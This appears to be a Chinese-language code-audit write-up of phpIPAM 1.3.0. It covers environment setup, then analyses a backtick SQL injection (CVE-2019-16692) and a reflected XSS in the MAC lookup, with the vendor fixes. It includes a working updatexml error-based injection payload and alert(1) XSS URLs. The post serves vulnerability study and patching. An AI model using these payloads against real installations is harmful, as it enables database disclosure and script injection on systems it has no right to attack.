简介
phphpipam是一个开源Web IP地址管理应用程序(IPAM)。其目标是提供轻便,现代且有用的IP地址管理。它是基于PHP的应用程序,具有MySQL数据库后端,使用jQuery库,ajax和HTML5 / CSS3功能。
官方网站:https://phpipam.net/
项目代码地址:https://github.com/phpipam/phpipam
使用的版本是phpipam1.3.0
搭建环境
这个搭建环境没有之前那么简单,遇到了几个问题
首先就是配置文件,它没有直接给你这个配置文件,而是给你了个config.dist.php文件,需要你自己在新建一个名为
config.php的配置文件,把config.dist.php配置文件的内容复制到config.php中,然后把数据库信息修改一下
修改成你自己的
下面开始访问,但是一直没有成功,自动跳转到根目录了。
读一下官方的文档,之后才知道默认是在根目录的,我们需要设置一下配置文件的信息修改成我们的目录
在这里我就修改一下我自己的
成功进入,之后又提示我没有安装扩展,因为我是在phpstudy里面部署的,所以有些扩展这里面都有
The following required PHP extensions are missing:
sockets
gmp
gettext
php PEAR support
Please recompile PHP to include missing extensions and restart Apache.
我是这几个扩展没有
在phpstudy里面勾选一下就可以了
还有最后一下需要下载,首先下载一下这个东西go-pear.phar
最后就是命名也是这个,下载的时候,不能复制粘贴,直接ctrl+s保存到php.exe的那个文件夹
然后就是
php go-pear.phar
按照提示安装即可
最后用
pear version
来检查一下是否安装成功
最后重启一下nginx或者apache就可以了
全局分析
系统默认开启报错显示
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
if (!$debugging) { error_reporting(E_ERROR ^ E_WARNING); }
else { error_reporting(E_ALL ^ E_NOTICE ^ E_STRICT); }
通过运行时配置 php.ini 的配置项 display_errors 和 display_startup_errors ,这样程序会输出报错信息。
通过 $debugging 值确定程序具体输出什么级别的报错信息(如果php.ini中报错信息被关闭,通过error_reporting函数也无法输出报错信息)
display_startup_errors 主要指启动错误,如配置文件出现问题而报错
这里都是打开报错提示的,如果存在sql注入就可能存在sql报错注入,不过开发者在程序上线时可能会把display_errors 和 display_startup_errors 设置为off,这个时候sql报错注入可能要转成盲注判断。
防御手段寻找
似乎没有对$_GET
,$_POST
这些数据做统一过滤。在seacms中会有对传进来的参数进行过滤
搜了sql,xss这些关键字,SQL主要是预编译,其中存在使用参数拼接了数据库表名的情况。另外在class.Common.php中找到一个去除标签的函数strip_input_tags(),但该函数只用于某些文件的$_POST变量传递的值
functions/classes/class.Common.php
public function strip_input_tags ($input) {
if(is_array($input)) {
foreach($input as $k=>$v) {
$input[$k] = strip_tags($v);
}
}
else {
$input = strip_tags($input);
}
# stripped
return $input;
}
然后有些文件会对$_POST数据做如下处理
# strip tags - XSS
$_POST = $User->strip_input_tags ($_POST);
SQL 注入
这里的sql注入还有cve编号
这个漏洞还有cve编号,CVE-2019-16692
【注入】
影响版本:phpipam <= 1.4.0
app/admin/custom-fields/edit.php
这里的要判断这个action参数是否存在,下面就是通过POST参数传入table
我们跟进一个这个函数
public function fetch_full_field_definition ($table, $field) {
# escape field
$table = $this->Database->escape($table);
# fetch
try { $field_data = $this->Database->getObjectQuery("show full columns from `$table` where `Field` = ?;", array($field)); }
catch (Exception $e) { $this->Result->show("danger", $e->getMessage(), false); return false; }
# result
return($field_data);
}
这个是对table进行查询,上面有个escape对table进行过滤我们跟进一下
再次跟进
$table 首先会经过 pdo->quote() 首尾被加上引号,并对其中的特殊字符转义
这里面是对单引号和双引号进行过滤,没有过滤反引号
这里sql注入我们只需要闭合反引号就可以了,而反引号不会被上面的操作过滤掉,所以这里存在sql注入漏洞
payload
GET http://127.0.0.1/phpipam/app/admin/custom-fields/edit.php
POST action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#
修复情况
294-303:
public function escape($str) {
$str = (string) $str;
if (strlen($str) == 0) return "";
if (!$this->isConnected()) $this->connect();
// SQL Injection - strip backquote character
$str = str_replace('`', '', $str);
return $this->unquote_outer($this->pdo->quote($str));
}
这里就是把反引号去除了
XSS
影响版本:phpipam <= 1.3.1
app/tools/mac-lookup/index.php
<input class="search input-md form-control" name="mac" placeholder="<?php print _('MAC address'); ?>" value='<?php print @$_GET['mac']; ?>' type="text" autofocus="autofocus" style='width:250px;'>
<?php
/* include results if IP address is posted */
if (strlen(@$_GET['mac'])>0) { include('results.php'); }
else { include('tips.php');}
?>
这里直接传入参数放到页面中,没有对这个参数进行过滤
我们跟踪一下results.php
<?php
# verify that user is logged in
$User->check_user_session();
// trim
$_GET['mac'] = trim($_GET['mac']);
// validate
if($User->validate_mac ($_GET['mac'])===false) {
$Result->show("warning", _("Invalid MAC address provided")." - ".$_GET['mac'], false);
}
else {
// check
$mac_vendor = $User->get_mac_address_vendor_details (trim($_GET['mac']));
// print
if($mac_vendor=="") {
$Result->show("info", _("No matches found for prefix")." ".$_GET['mac'], false);
}
else {
$mac = strtoupper($User->reformat_mac_address ($_GET['mac'], $format = 1));
$mac_partial = explode(":", $mac);
// print
print "<div style='font-size:16px;'>Vendor: <strong>".$mac_vendor."</strong></div><hr>";
print "Prefix: ".$mac_partial[0].":".$mac_partial[1].":".$mac_partial[2]."<br>";
print "MAC: ".$_GET['mac'];
}
}
这里面也没有任何的过滤
payload
http://127.0.0.1/phpipam/app/tools/mac-lookup/?mac=%27onclick%20alert(1)
http://127.0.0.1/phpipam/app/tools/mac-lookup/?mac=%3Cscript%3Ealert(1)%3C/script%3E
【修复情况】
app/tools/mac-lookup/index.php
<input class="search input-md form-control" name="mac" placeholder="<?php print _('MAC address'); ?>" value='<?php print @escape_input($_POST['mac']); ?>' type="text" autofocus="autofocus" style='width:250px;'>
app/tools/mac-lookup/results.php
5:$mac = escape_input(trim($_POST['mac']));
26:print "MAC: ".$mac;
$mac 参数通过escape_input()做了过滤
functions/global_functions.php
function escape_input($data) {
return (!isset($data) || strlen($data)==0) ? '' : htmlentities($data, ENT_QUOTES);
}
htmlentities 将字符转换为 HTML 转义字符,ENT_QUOTES 标识表示既转换双引号也转换单引号。